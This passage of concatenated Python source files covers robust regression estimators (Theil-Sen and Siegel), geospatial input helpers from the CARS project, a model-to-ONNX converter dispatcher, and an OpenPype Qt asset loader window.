medslope*x)`` in [4]_. The approach to compute the intercept can be determined by the parameter ``method``. A confidence interval for the intercept is not given as this question is not addressed in [1]_. References ---------- .. [1] P.K. Sen, "Estimates of the regression coefficient based on Kendall's tau", J. Am. Stat. Assoc., Vol. 63, pp. 1379-1389, 1968. .. [2] H. Theil, "A rank-invariant method of linear and polynomial regression analysis I, II and III", Nederl. Akad. Wetensch., Proc. 53:, pp. 386-392, pp. 521-525, pp. 1397-1412, 1950. .. [3] W.L. Conover, "Practical nonparametric statistics", 2nd ed., John Wiley and Sons, New York, pp. 493. .. [4] https://en.wikipedia.org/wiki/Theil%E2%80%93Sen_estimator Examples -------- >>> from scipy import stats >>> import matplotlib.pyplot as plt >>> x = np.linspace(-5, 5, num=150) >>> y = x + np.random.normal(size=x.size) >>> y[11:15] += 10 # add outliers >>> y[-5:] -= 7 Compute the slope, intercept and 90% confidence interval. For comparison, also compute the least-squares fit with `linregress`: >>> res = stats.theilslopes(y, x, 0.90, method='separate') >>> lsq_res = stats.linregress(x, y) Plot the results. The Theil-Sen regression line is shown in red, with the dashed red lines illustrating the confidence interval of the slope (note that the dashed red lines are not the confidence interval of the regression as the confidence interval of the intercept is not included). The green line shows the least-squares fit for comparison. >>> fig = plt.figure() >>> ax = fig.add_subplot(111) >>> ax.plot(x, y, 'b.') >>> ax.plot(x, res[1] + res[0] * x, 'r-') >>> ax.plot(x, res[1] + res[2] * x, 'r--') >>> ax.plot(x, res[1] + res[3] * x, 'r--') >>> ax.plot(x, lsq_res[1] + lsq_res[0] * x, 'g-') >>> plt.show() """ if method not in ['joint', 'separate']: raise ValueError(("method must be either 'joint' or 'separate'." "'{}' is invalid.".format(method))) # We copy both x and y so we can use _find_repeats. y = np.array(y).flatten() if x is None: x = np.arange(len(y), dtype=float) else: x = np.array(x, dtype=float).flatten() if len(x) != len(y): raise ValueError("Incompatible lengths ! 
(%s<>%s)" % (len(y), len(x))) # Compute sorted slopes only when deltax > 0 deltax = x[:, np.newaxis] - x deltay = y[:, np.newaxis] - y slopes = deltay[deltax > 0] / deltax[deltax > 0] slopes.sort() medslope = np.median(slopes) if method == 'joint': medinter = np.median(y - medslope * x) else: medinter = np.median(y) - medslope * np.median(x) # Now compute confidence intervals if alpha > 0.5: alpha = 1. - alpha z = distributions.norm.ppf(alpha / 2.) # This implements (2.6) from Sen (1968) _, nxreps = _find_repeats(x) _, nyreps = _find_repeats(y) nt = len(slopes) # N in Sen (1968) ny = len(y) # n in Sen (1968) # Equation 2.6 in Sen (1968): sigsq = 1/18. * (ny * (ny-1) * (2*ny+5) - sum(k * (k-1) * (2*k + 5) for k in nxreps) - sum(k * (k-1) * (2*k + 5) for k in nyreps)) # Find the confidence interval indices in `slopes` sigma = np.sqrt(sigsq) Ru = min(int(np.round((nt - z*sigma)/2.)), len(slopes)-1) Rl = max(int(np.round((nt + z*sigma)/2.)) - 1, 0) delta = slopes[[Rl, Ru]] return medslope, medinter, delta[0], delta[1] def _find_repeats(arr): # This function assumes it may clobber its input. if len(arr) == 0: return np.array(0, np.float64), np.array(0, np.intp) # XXX This cast was previously needed for the Fortran implementation, # should we ditch it? arr = np.asarray(arr, np.float64).ravel() arr.sort() # Taken from NumPy 1.9's np.unique. change = np.concatenate(([True], arr[1:] != arr[:-1])) unique = arr[change] change_idx = np.concatenate(np.nonzero(change) + ([arr.size],)) freq = np.diff(change_idx) atleast2 = freq > 1 return unique[atleast2], freq[atleast2] def siegelslopes(y, x=None, method="hierarchical"): r""" Computes the Siegel estimator for a set of points (x, y). `siegelslopes` implements a method for robust linear regression using repeated medians (see [1]_) to fit a line to the points (x, y). The method is robust to outliers with an asymptotic breakdown point of 50%. Parameters ---------- y : array_like Dependent variable. x : array_like or None, optional Independent variable. If None, use ``arange(len(y))`` instead. method : {'hierarchical', 'separate'} If 'hierarchical', estimate the intercept using the estimated slope ``medslope`` (default option). If 'separate', estimate the intercept independent of the estimated slope. See Notes for details. Returns ------- medslope : float Estimate of the slope of the regression line. medintercept : float Estimate of the intercept of the regression line. See Also -------- theilslopes : a similar technique without repeated medians Notes ----- With ``n = len(y)``, compute ``m_j`` as the median of the slopes from the point ``(x[j], y[j])`` to all other `n-1` points. ``medslope`` is then the median of all slopes ``m_j``. Two ways are given to estimate the intercept in [1]_ which can be chosen via the parameter ``method``. The hierarchical approach uses the estimated slope ``medslope`` and computes ``medintercept`` as the median of ``y - medslope*x``. The other approach estimates the intercept separately as follows: for each point ``(x[j], y[j])``, compute the intercepts of all the `n-1` lines through the remaining points and take the median ``i_j``. ``medintercept`` is the median of the ``i_j``. The implementation computes `n` times the median of a vector of size `n` which can be slow for large vectors. There are more efficient algorithms (see [2]_) which are not implemented here. References ---------- .. [1] A. Siegel, "Robust Regression Using Repeated Medians", Biometrika, Vol. 69, pp. 242-244, 1982. .. [2] A. Stein and M. 
Werman, "Finding the repeated median regression line", Proceedings of the Third Annual ACM-SIAM Symposium on Discrete Algorithms, pp. 409-413, 1992. Examples -------- >>> from scipy import stats >>> import matplotlib.pyplot as plt >>> x = np.linspace(-5, 5, num=150) >>> y = x + np.random.normal(size=x.size) >>> y[11:15] += 10 # add outliers >>> y[-5:] -= 7 Compute the slope and intercept. For comparison, also compute the least-squares fit with `linregress`: >>> res = stats.siegelslopes(y, x) >>> lsq_res = stats.linregress(x, y) Plot the results. The Siegel regression line is shown in red. The green line shows the least-squares fit for comparison. >>> fig = plt.figure() >>> ax = fig.add_subplot(111) >>> ax.plot(x, y, 'b.') >>> ax.plot(x, res[1] + res[0] * x, 'r-') >>> ax.plot(x, lsq_res[1] + lsq_res[0] * x, 'g-') >>> plt.show() """ if method not in ['hierarchical', 'separate']: raise ValueError("method can only be 'hierarchical' or 'separate'") y = np.asarray(y).ravel() if x is None: x = np.arange(len(y), dtype=float) else: x = np.asarray(x, dtype=float).ravel() if len(x) != len(y): raise ValueError("Incompatible lengths ! (%s<>%s)" % (len(y), len(x))) deltax = x[:, np.newaxis] - x deltay = y[:, np.newaxis] - y slopes, intercepts = [], [] for j in range(len(x)): id_nonzero = deltax[j, :] != 0 slopes_j = deltay[j, id_nonzero] / deltax[j, id_nonzero] medslope_j = np.median(slopes_j) slopes.append(medslope_j) if method == 'separate': z = y*x[j] - y[j]*x medintercept_j = np.median(z[id_nonzero] / deltax[j, id_nonzero]) intercepts.append(medintercept_j) medslope = np.median(np.asarray(slopes)) if method == "separate": medinter = np.median(np.asarray(intercepts)) else: medinter = np.median(y - medslope*x) return medslope, medinter
the-stack_106_24420
#!/usr/bin/env python # coding: utf8 # # Copyright (c) 2020 Centre National d'Etudes Spatiales (CNES). # # This file is part of CARS # (see https://github.com/CNES/cars). # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Inputs module: contains some CARS global shared general purpose inputs functions """ # Standard imports import logging import os import struct import warnings from typing import Tuple # Third party imports import fiona import numpy as np import rasterio as rio import xarray as xr from json_checker import Checker from shapely.geometry import shape from cars.externals.otb_pipelines import read_image # Filter rasterio warning when image is not georeferenced warnings.filterwarnings("ignore", category=rio.errors.NotGeoreferencedWarning) def read_vector(path_to_file): """ Read vector file and returns the corresponding polygon :raise Exception when the input file is unreadable :param path_to_file: path to the file to open :type path_to_file: str :return: a shapely polygon :rtype: tuple (polygon, epsg) """ try: polys = [] with fiona.open(path_to_file) as vec_file: _, epsg = vec_file.crs["init"].split(":") for feat in vec_file: polys.append(shape(feat["geometry"])) except BaseException as base_except: raise Exception( "Impossible to read {} file".format(path_to_file) ) from base_except if len(polys) == 1: return polys[0], int(epsg) if len(polys) > 1: logging.info( "Multi features files are not supported, " "the first feature of {} will be used".format(path_to_file) ) return polys[0], int(epsg) logging.info("No feature is present in the {} file".format(path_to_file)) return None def read_geoid_file(): """ Read geoid height from OTB geoid file Geoid is defined by the $OTB_GEOID_FILE global environement variable. A default CARS geoid is deployed in setup.py and configured in conf/static_conf.py Geoid is returned as an xarray.Dataset and height is stored in the `hgt` variable, which is indexed by `lat` and `lon` coordinates. Dataset attributes contain geoid bounds geodetic coordinates and latitude/longitude step spacing. :return: the geoid height array in meter. :rtype: xarray.Dataset """ # Set geoid path from OTB_GEOID_FILE geoid_path = os.environ.get("OTB_GEOID_FILE") with open(geoid_path, mode="rb") as in_grd: # reading binary data # first header part, 4 float of 4 bytes -> 16 bytes to read # Endianness seems to be Big-Endian. lat_min, lat_max, lon_min, lon_max = struct.unpack( ">ffff", in_grd.read(16) ) lat_step, lon_step = struct.unpack(">ff", in_grd.read(8)) n_lats = int(np.ceil((lat_max - lat_min)) / lat_step) + 1 n_lons = int(np.ceil((lon_max - lon_min)) / lon_step) + 1 # read height grid. 
geoid_height = np.fromfile(in_grd, ">f4").reshape(n_lats, n_lons) # create output Dataset geoid = xr.Dataset( {"hgt": (("lat", "lon"), geoid_height)}, coords={ "lat": np.linspace(lat_max, lat_min, n_lats), "lon": np.linspace(lon_min, lon_max, n_lons), }, attrs={ "lat_min": lat_min, "lat_max": lat_max, "lon_min": lon_min, "lon_max": lon_max, "d_lat": lat_step, "d_lon": lon_step, }, ) return geoid def rasterio_get_nb_bands(raster_file: str) -> int: """ Get the number of bands in an image file :param f: Image file :returns: The number of bands """ with rio.open(raster_file, "r") as descriptor: return descriptor.count def rasterio_get_size(raster_file: str) -> Tuple[int, int]: """ Get the size of an image (file) :param raster_file: Image file :returns: The size (width, height) """ with rio.open(raster_file, "r") as descriptor: return (descriptor.width, descriptor.height) def rasterio_can_open(raster_file: str) -> bool: """ Test if a file can be open by rasterio :param raster_file: File to test :returns: True if rasterio can open file and False otherwise """ try: rio.open(raster_file) return True except Exception as read_error: logging.warning( "Impossible to read file {}: {}".format(raster_file, read_error) ) return False def ncdf_can_open(file_path): """ Checks if the given file can be opened by NetCDF :param file_path: file path. :type file_path: str :return: True if it can be opened, False otherwise. :rtype: bool """ try: with xr.open_dataset(file_path) as _: return True except Exception as read_error: logging.warning( "Exception caught while trying to read file {}: {}".format( file_path, read_error ) ) return False def otb_can_open(raster_file: str) -> bool: """ Test if file can be open by otb and that it has a correct geom file associated :param raster_file: filename :return: True if the file can be used with the otb, False otherwise """ can_open_status = False try: geom_path = "./otb_can_open_test.geom" read_image(raster_file, geom_path) if os.path.exists(geom_path): with open(geom_path) as geom_file_desc: geom_dict = {} for line in geom_file_desc: key, val = line.split(": ") geom_dict[key] = val # pylint: disable=too-many-boolean-expressions if ( "line_den_coeff_00" not in geom_dict or "samp_den_coeff_00" not in geom_dict or "line_num_coeff_00" not in geom_dict or "samp_num_coeff_00" not in geom_dict or "line_off" not in geom_dict or "line_scale" not in geom_dict or "samp_off" not in geom_dict or "samp_scale" not in geom_dict or "lat_off" not in geom_dict or "lat_scale" not in geom_dict or "long_off" not in geom_dict or "long_scale" not in geom_dict or "height_off" not in geom_dict or "height_scale" not in geom_dict or "polynomial_format" not in geom_dict ): logging.warning( "No RPC model set for image {}".format(geom_file_desc) ) can_open_status = False os.remove("./otb_can_open_test.geom") can_open_status = True else: logging.warning( "{} does not have associated geom file".format(raster_file) ) can_open_status = False except Exception as read_error: logging.warning( "Exception caught while trying to read file {}: {}".format( raster_file, read_error ) ) can_open_status = False return can_open_status def check_json(conf, schema): """ Check a dictionary with respect to a schema :param conf: The dictionary to check :type conf: dict :param schema: The schema to use :type schema: dict :returns: conf if check succeeds (else raises CheckerError) :rtype: dict """ schema_validator = Checker(schema) checked_conf = schema_validator.validate(conf) return checked_conf
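# --- Hedged usage sketch (appended; not part of the original module) ---
# check_json() is a thin wrapper around json_checker.Checker; the schema and
# configuration below are invented purely for illustration.
if __name__ == "__main__":
    _demo_schema = {"resolution": float, "epsg": int}
    _demo_conf = {"resolution": 0.5, "epsg": 32631}
    # Returns the configuration unchanged when it matches the schema,
    # otherwise a CheckerError is raised (see the check_json docstring).
    print(check_json(_demo_conf, _demo_schema))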
the-stack_106_24421
import logging
from typing import Optional, Tuple

from .tflite import TFLiteConverter
from .sklearn import SklearnConverter
from .tensorflow import TensorflowConverter
from .torch import TorchConverter


class ModelConverter:
    def __init__(self, model_path: str, input_dims: Optional[Tuple[int]]):
        self.model_path = model_path
        self.input_dims = input_dims

    def apply_conversion(self) -> None:
        """
        Apply conversion to the model and save the result on the same path.
        """
        file_extension = self.model_path.split('.')[-1]
        if file_extension == 'onnx':
            logging.info('Nothing to do, model is already onnx')
            return
        converters = {
            'h5': TensorflowConverter(),
            'pkl': SklearnConverter(),
            'tflite': TFLiteConverter(),
            'pt': TorchConverter()
        }
        if file_extension not in converters:
            raise ValueError(f'unsupported file extension: {file_extension}')
        if file_extension == 'pt':
            converters[file_extension].transform_with_dims(self.model_path, self.input_dims)
            return
        converters[file_extension].transform(self.model_path)
        return
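# --- Hedged usage sketch (appended; not part of the original module) ---
# The model path and input dimensions below are placeholders; per the
# apply_conversion() docstring, the ONNX result is saved on the same path by
# the per-framework converters imported above.
def _example_usage():
    converter = ModelConverter("model.pt", input_dims=(1, 3, 224, 224))
    converter.apply_conversion()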
the-stack_106_24424
import sys

from Qt import QtWidgets, QtCore

from avalon import api, io, pipeline

from openpype import style
from openpype.tools.utils.widgets import AssetWidget
from openpype.tools.utils import lib

from .widgets import (
    SubsetWidget,
    VersionWidget,
    FamilyListView,
    ThumbnailWidget,
    RepresentationWidget,
    OverlayFrame
)

from openpype.modules import ModulesManager

module = sys.modules[__name__]
module.window = None


# Register callback on task change
# - callback can't be defined in Window as it is a weak reference callback,
#   so `WeakSet` would remove it immediately
def on_context_task_change(*args, **kwargs):
    if module.window:
        module.window.on_context_task_change(*args, **kwargs)


pipeline.on("taskChanged", on_context_task_change)


class LoaderWindow(QtWidgets.QDialog):
    """Asset loader interface"""

    tool_name = "loader"
    message_timeout = 5000

    def __init__(self, parent=None):
        super(LoaderWindow, self).__init__(parent)
        title = "Asset Loader 2.1"
        project_name = api.Session.get("AVALON_PROJECT")
        if project_name:
            title += " - {}".format(project_name)
        self.setWindowTitle(title)

        # Groups config
        self.groups_config = lib.GroupsConfig(io)
        self.family_config_cache = lib.FamilyConfigCache(io)

        # Enable minimize and maximize for app
        window_flags = QtCore.Qt.Window
        if not parent:
            window_flags |= QtCore.Qt.WindowStaysOnTopHint
        self.setWindowFlags(window_flags)
        self.setFocusPolicy(QtCore.Qt.StrongFocus)

        main_splitter = QtWidgets.QSplitter(self)

        # --- Left part ---
        left_side_splitter = QtWidgets.QSplitter(main_splitter)
        left_side_splitter.setOrientation(QtCore.Qt.Vertical)

        # Assets widget
        assets_widget = AssetWidget(
            io, multiselection=True, parent=left_side_splitter
        )
        assets_widget.set_current_asset_btn_visibility(True)

        # Families widget
        families_filter_view = FamilyListView(
            io, self.family_config_cache, left_side_splitter
        )
        left_side_splitter.addWidget(assets_widget)
        left_side_splitter.addWidget(families_filter_view)
        left_side_splitter.setStretchFactor(0, 65)
        left_side_splitter.setStretchFactor(1, 35)

        # --- Middle part ---
        # Subsets widget
        subsets_widget = SubsetWidget(
            io,
            self.groups_config,
            self.family_config_cache,
            tool_name=self.tool_name,
            parent=main_splitter
        )

        # --- Right part ---
        thumb_ver_splitter = QtWidgets.QSplitter(main_splitter)
        thumb_ver_splitter.setOrientation(QtCore.Qt.Vertical)

        thumbnail_widget = ThumbnailWidget(io, parent=thumb_ver_splitter)
        version_info_widget = VersionWidget(io, parent=thumb_ver_splitter)

        thumb_ver_splitter.addWidget(thumbnail_widget)
        thumb_ver_splitter.addWidget(version_info_widget)

        thumb_ver_splitter.setStretchFactor(0, 30)
        thumb_ver_splitter.setStretchFactor(1, 35)

        manager = ModulesManager()
        sync_server = manager.modules_by_name.get("sync_server")
        sync_server_enabled = False
        if sync_server is not None:
            sync_server_enabled = sync_server.enabled

        repres_widget = None
        if sync_server_enabled:
            repres_widget = RepresentationWidget(
                io, self.tool_name, parent=thumb_ver_splitter
            )
            thumb_ver_splitter.addWidget(repres_widget)

        main_splitter.addWidget(left_side_splitter)
        main_splitter.addWidget(subsets_widget)
        main_splitter.addWidget(thumb_ver_splitter)
        if sync_server_enabled:
            main_splitter.setSizes([250, 1000, 550])
        else:
            main_splitter.setSizes([250, 850, 200])

        footer_widget = QtWidgets.QWidget(self)

        message_label = QtWidgets.QLabel(footer_widget)

        footer_layout = QtWidgets.QHBoxLayout(footer_widget)
        footer_layout.setContentsMargins(0, 0, 0, 0)
        footer_layout.addWidget(message_label, 1)

        layout = QtWidgets.QVBoxLayout(self)
        layout.addWidget(main_splitter, 1)
        layout.addWidget(footer_widget, 0)

        self.data = {
            "state": {
                "assetIds": None
            }
        }

        overlay_frame = OverlayFrame("Loading...", self)
        overlay_frame.setVisible(False)

        message_timer = QtCore.QTimer()
        message_timer.setInterval(self.message_timeout)
        message_timer.setSingleShot(True)

        message_timer.timeout.connect(self._on_message_timeout)

        families_filter_view.active_changed.connect(
            self._on_family_filter_change
        )
        assets_widget.selection_changed.connect(self.on_assetschanged)
        assets_widget.refresh_triggered.connect(self.on_assetschanged)
        # TODO do not touch view in asset widget
        assets_widget.view.clicked.connect(self.on_assetview_click)
        subsets_widget.active_changed.connect(self.on_subsetschanged)
        subsets_widget.version_changed.connect(self.on_versionschanged)
        subsets_widget.refreshed.connect(self._on_subset_refresh)

        subsets_widget.load_started.connect(self._on_load_start)
        subsets_widget.load_ended.connect(self._on_load_end)
        if repres_widget:
            repres_widget.load_started.connect(self._on_load_start)
            repres_widget.load_ended.connect(self._on_load_end)

        self._sync_server_enabled = sync_server_enabled

        self._assets_widget = assets_widget
        self._families_filter_view = families_filter_view

        self._subsets_widget = subsets_widget

        self._version_info_widget = version_info_widget
        self._thumbnail_widget = thumbnail_widget
        self._repres_widget = repres_widget

        self._message_label = message_label
        self._message_timer = message_timer

        # TODO add overlay using stack widget
        self._overlay_frame = overlay_frame

        self.family_config_cache.refresh()
        self.groups_config.refresh()

        self._refresh()
        self._assetschanged()

        self._first_show = True

    def resizeEvent(self, event):
        super(LoaderWindow, self).resizeEvent(event)
        self._overlay_frame.resize(self.size())

    def moveEvent(self, event):
        super(LoaderWindow, self).moveEvent(event)
        self._overlay_frame.move(0, 0)

    def showEvent(self, event):
        super(LoaderWindow, self).showEvent(event)
        if self._first_show:
            self._first_show = False
            self.setStyleSheet(style.load_stylesheet())
            if self._sync_server_enabled:
                self.resize(1800, 900)
            else:
                self.resize(1300, 700)

    # -------------------------------
    # Delay calling blocking methods
    # -------------------------------
    def on_assetview_click(self, *args):
        # TODO do not touch inner attributes of subset widget
        selection_model = self._subsets_widget.view.selectionModel()
        if selection_model.selectedIndexes():
            selection_model.clearSelection()

    def refresh(self):
        self.echo("Fetching results..")
        lib.schedule(self._refresh, 50, channel="mongo")

    def on_assetschanged(self, *args):
        self.echo("Fetching asset..")
        lib.schedule(self._assetschanged, 50, channel="mongo")

    def on_subsetschanged(self, *args):
        self.echo("Fetching subset..")
        lib.schedule(self._subsetschanged, 50, channel="mongo")

    def on_versionschanged(self, *args):
        self.echo("Fetching version..")
        lib.schedule(self._versionschanged, 150, channel="mongo")

    def set_context(self, context, refresh=True):
        self.echo("Setting context: {}".format(context))
        lib.schedule(lambda: self._set_context(context, refresh=refresh),
                     50, channel="mongo")

    def _on_load_start(self):
        # Show overlay and process events so it's repainted
        self._overlay_frame.setVisible(True)
        QtWidgets.QApplication.processEvents()

    def _hide_overlay(self):
        self._overlay_frame.setVisible(False)

    def _on_subset_refresh(self, has_item):
        self._subsets_widget.set_loading_state(
            loading=False, empty=not has_item
        )
        families = self._subsets_widget.get_subsets_families()
        self._families_filter_view.set_enabled_families(families)

    def _on_load_end(self):
        # Delay hiding as click events that happened during loading
        # should be blocked
        QtCore.QTimer.singleShot(100, self._hide_overlay)

    # ------------------------------
    def _on_family_filter_change(self, families):
        self._subsets_widget.set_family_filters(families)

    def on_context_task_change(self, *args, **kwargs):
        # Refresh families config
        self._families_filter_view.refresh()
        # Change to context asset on context change
        self._assets_widget.select_assets(io.Session["AVALON_ASSET"])

    def _refresh(self):
        """Load assets from database"""
        # Ensure a project is loaded
        project = io.find_one({"type": "project"}, {"type": 1})
        assert project, "Project was not found! This is a bug"

        self._assets_widget.refresh()
        self._assets_widget.setFocus()

        self._families_filter_view.refresh()

    def clear_assets_underlines(self):
        """Clear colors from asset data to remove colored underlines.

        When multiple assets are selected, colored underlines mark which
        asset owns the selected subsets. These colors must be cleared from
        asset data on selection change so they match the current selection.
        """
        # TODO do not touch inner attributes of asset widget
        last_asset_ids = self.data["state"]["assetIds"] or []
        if not last_asset_ids:
            return

        assets_widget = self._assets_widget
        id_role = assets_widget.model.ObjectIdRole

        for index in lib.iter_model_rows(assets_widget.model, 0):
            if index.data(id_role) not in last_asset_ids:
                continue

            assets_widget.model.setData(
                index, [], assets_widget.model.subsetColorsRole
            )

    def _assetschanged(self):
        """Selected assets have changed"""
        subsets_widget = self._subsets_widget
        # TODO do not touch subset widget inner attributes
        subsets_model = subsets_widget.model

        subsets_model.clear()
        self.clear_assets_underlines()

        # filter None docs they are silo
        asset_docs = self._assets_widget.get_selected_assets()
        asset_ids = [asset_doc["_id"] for asset_doc in asset_docs]

        # Start loading
        subsets_widget.set_loading_state(
            loading=bool(asset_ids),
            empty=True
        )

        subsets_model.set_assets(asset_ids)
        subsets_widget.view.setColumnHidden(
            subsets_model.Columns.index("asset"),
            len(asset_ids) < 2
        )

        # Clear the version information on asset change
        self._thumbnail_widget.set_thumbnail(asset_docs)
        self._version_info_widget.set_version(None)

        self.data["state"]["assetIds"] = asset_ids

        # reset repre list
        if self._repres_widget is not None:
            self._repres_widget.set_version_ids([])

    def _subsetschanged(self):
        asset_ids = self.data["state"]["assetIds"]
        # Skip setting colors if not asset multiselection
        if not asset_ids or len(asset_ids) < 2:
            self._versionschanged()
            return

        selected_subsets = self._subsets_widget.selected_subsets(
            _merged=True, _other=False
        )

        asset_models = {}
        asset_ids = []
        for subset_node in selected_subsets:
            asset_ids.extend(subset_node.get("assetIds", []))
        asset_ids = set(asset_ids)

        for subset_node in selected_subsets:
            for asset_id in asset_ids:
                if asset_id not in asset_models:
                    asset_models[asset_id] = []

                color = None
                if asset_id in subset_node.get("assetIds", []):
                    color = subset_node["subsetColor"]

                asset_models[asset_id].append(color)

        self.clear_assets_underlines()

        # TODO do not use inner attributes of asset widget
        assets_widget = self._assets_widget
        indexes = assets_widget.view.selectionModel().selectedRows()
        for index in indexes:
            id = index.data(assets_widget.model.ObjectIdRole)
            if id not in asset_models:
                continue

            assets_widget.model.setData(
                index, asset_models[id], assets_widget.model.subsetColorsRole
            )
        # Trigger repaint
        assets_widget.view.updateGeometries()
        # Set version in Version Widget
        self._versionschanged()

    def _versionschanged(self):
        subsets = self._subsets_widget
        selection = subsets.view.selectionModel()

        # Active must be in the selected rows otherwise we
        # assume it's not actually an "active" current index.
        version_docs = None
        version_doc = None
        active = selection.currentIndex()
        rows = selection.selectedRows(column=active.column())
        if active:
            if active in rows:
                item = active.data(subsets.model.ItemRole)
                if (
                    item is not None
                    and not (item.get("isGroup") or item.get("isMerged"))
                ):
                    version_doc = item["version_document"]

        if rows:
            version_docs = []
            for index in rows:
                if not index or not index.isValid():
                    continue
                item = index.data(subsets.model.ItemRole)
                if item is None:
                    continue
                if item.get("isGroup") or item.get("isMerged"):
                    for child in item.children():
                        version_docs.append(child["version_document"])
                else:
                    version_docs.append(item["version_document"])

        self._version_info_widget.set_version(version_doc)

        thumbnail_docs = version_docs
        asset_docs = self._assets_widget.get_selected_assets()
        if not thumbnail_docs:
            if len(asset_docs) > 0:
                thumbnail_docs = asset_docs

        self._thumbnail_widget.set_thumbnail(thumbnail_docs)

        if self._repres_widget is not None:
            version_ids = [doc["_id"] for doc in version_docs or []]
            self._repres_widget.set_version_ids(version_ids)

            # self._repres_widget.change_visibility("subset", len(rows) > 1)
            # self._repres_widget.change_visibility(
            #     "asset", len(asset_docs) > 1
            # )

    def _set_context(self, context, refresh=True):
        """Set the selection in the interface using a context.

        The context must contain `asset` data by name.

        Note: Prior to setting context ensure `refresh` is triggered so that
            the "silos" are listed correctly. Aside from that, setting the
            context will force a refresh further down because it changes
            the active silo and asset.

        Args:
            context (dict): The context to apply.

        Returns:
            None
        """
        asset = context.get("asset", None)
        if asset is None:
            return

        if refresh:
            # Workaround:
            # Force a direct (non-scheduled) refresh prior to setting the
            # asset widget's silo and asset selection to ensure it's correctly
            # displaying the silo tabs. When calling `window.refresh()` and
            # directly afterwards `window.set_context()`, the `set_context()`
            # seems to override the scheduled refresh and the silo tabs are
            # not shown.
            self._refresh()

        self._assets_widget.select_assets(asset)

    def _on_message_timeout(self):
        self._message_label.setText("")

    def echo(self, message):
        self._message_label.setText(str(message))
        print(message)
        self._message_timer.start()

    def closeEvent(self, event):
        # Kill on holding SHIFT
        modifiers = QtWidgets.QApplication.queryKeyboardModifiers()
        shift_pressed = QtCore.Qt.ShiftModifier & modifiers

        if shift_pressed:
            print("Force quit..")
            self.setAttribute(QtCore.Qt.WA_DeleteOnClose)

        print("Good bye")
        return super(LoaderWindow, self).closeEvent(event)

    def keyPressEvent(self, event):
        modifiers = event.modifiers()
        ctrl_pressed = QtCore.Qt.ControlModifier & modifiers

        # Grouping subsets on pressing Ctrl + G
        if (ctrl_pressed and event.key() == QtCore.Qt.Key_G
                and not event.isAutoRepeat()):
            self.show_grouping_dialog()
            return

        super(LoaderWindow, self).keyPressEvent(event)
        event.setAccepted(True)  # Avoid interfering with other widgets

    def show_grouping_dialog(self):
        subsets = self._subsets_widget
        if not subsets.is_groupable():
            self.echo("Grouping not enabled.")
            return

        selected = []
        merged_items = []
        for item in subsets.selected_subsets(_merged=True):
            if item.get("isMerged"):
                merged_items.append(item)
            else:
                selected.append(item)

        for merged_item in merged_items:
            for child_item in merged_item.children():
                selected.append(child_item)

        if not selected:
            self.echo("No selected subset.")
            return

        dialog = SubsetGroupingDialog(
            items=selected, groups_config=self.groups_config, parent=self
        )
        dialog.grouped.connect(self._assetschanged)
        dialog.show()


class SubsetGroupingDialog(QtWidgets.QDialog):
    grouped = QtCore.Signal()

    def __init__(self, items, groups_config, parent=None):
        super(SubsetGroupingDialog, self).__init__(parent=parent)
        self.setWindowTitle("Grouping Subsets")
        self.setMinimumWidth(250)
        self.setModal(True)

        self.items = items
        self.groups_config = groups_config
        # TODO do not touch inner attributes
        self.subsets = parent._subsets_widget
        self.asset_ids = parent.data["state"]["assetIds"]

        name = QtWidgets.QLineEdit()
        name.setPlaceholderText("Remain blank to ungroup..")

        # Menu for pre-defined subset groups
        name_button = QtWidgets.QPushButton()
        name_button.setFixedWidth(18)
        name_button.setFixedHeight(20)
        name_menu = QtWidgets.QMenu(name_button)
        name_button.setMenu(name_menu)

        name_layout = QtWidgets.QHBoxLayout()
        name_layout.addWidget(name)
        name_layout.addWidget(name_button)
        name_layout.setContentsMargins(0, 0, 0, 0)

        group_btn = QtWidgets.QPushButton("Apply")

        layout = QtWidgets.QVBoxLayout(self)
        layout.addWidget(QtWidgets.QLabel("Group Name"))
        layout.addLayout(name_layout)
        layout.addWidget(group_btn)

        group_btn.clicked.connect(self.on_group)
        group_btn.setAutoDefault(True)
        group_btn.setDefault(True)

        self.name = name
        self.name_menu = name_menu

        self._build_menu()

    def _build_menu(self):
        menu = self.name_menu
        button = menu.parent()

        # Get and destroy the action group
        group = button.findChild(QtWidgets.QActionGroup)
        if group:
            group.deleteLater()

        active_groups = self.groups_config.active_groups(self.asset_ids)

        # Build new action group
        group = QtWidgets.QActionGroup(button)
        group_names = list()
        for data in sorted(active_groups, key=lambda x: x["order"]):
            name = data["name"]
            if name in group_names:
                continue
            group_names.append(name)

            icon = data["icon"]

            action = group.addAction(name)
            action.setIcon(icon)
            menu.addAction(action)

        group.triggered.connect(self._on_action_clicked)
        button.setEnabled(not menu.isEmpty())

    def _on_action_clicked(self, action):
        self.name.setText(action.text())

    def on_group(self):
        name = self.name.text().strip()
        self.subsets.group_subsets(name, self.asset_ids, self.items)

        with lib.preserve_selection(tree_view=self.subsets.view,
                                    current_index=False):
            self.grouped.emit()
            self.close()


def show(debug=False, parent=None, use_context=False):
    """Display Loader GUI

    Arguments:
        debug (bool, optional): Run loader in debug-mode,
            defaults to False
        parent (QtCore.QObject, optional): The Qt object to parent to.
        use_context (bool): Whether to apply the current context upon launch

    """
    # Remember window
    if module.window is not None:
        try:
            module.window.show()

            # If the window is minimized then unminimize it.
            if module.window.windowState() & QtCore.Qt.WindowMinimized:
                module.window.setWindowState(QtCore.Qt.WindowActive)

            # Raise and activate the window
            module.window.raise_()             # for MacOS
            module.window.activateWindow()     # for Windows
            module.window.refresh()
            return
        except (AttributeError, RuntimeError):
            # Garbage collected
            module.window = None

    if debug:
        import traceback
        sys.excepthook = lambda typ, val, tb: traceback.print_last()

        io.install()

        any_project = next(
            project for project in io.projects()
            if project.get("active", True) is not False
        )

        api.Session["AVALON_PROJECT"] = any_project["name"]
        module.project = any_project["name"]

    with lib.application():
        window = LoaderWindow(parent)
        window.show()

        if use_context:
            context = {"asset": api.Session["AVALON_ASSET"]}
            window.set_context(context, refresh=True)
        else:
            window.refresh()

        module.window = window

        # Pull window to the front.
        module.window.raise_()
        module.window.activateWindow()


def cli(args):
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("project")

    args = parser.parse_args(args)
    project = args.project

    print("Entering Project: %s" % project)

    io.install()

    # Store settings
    api.Session["AVALON_PROJECT"] = project

    from avalon import pipeline

    # Find the set config
    _config = pipeline.find_config()
    if hasattr(_config, "install"):
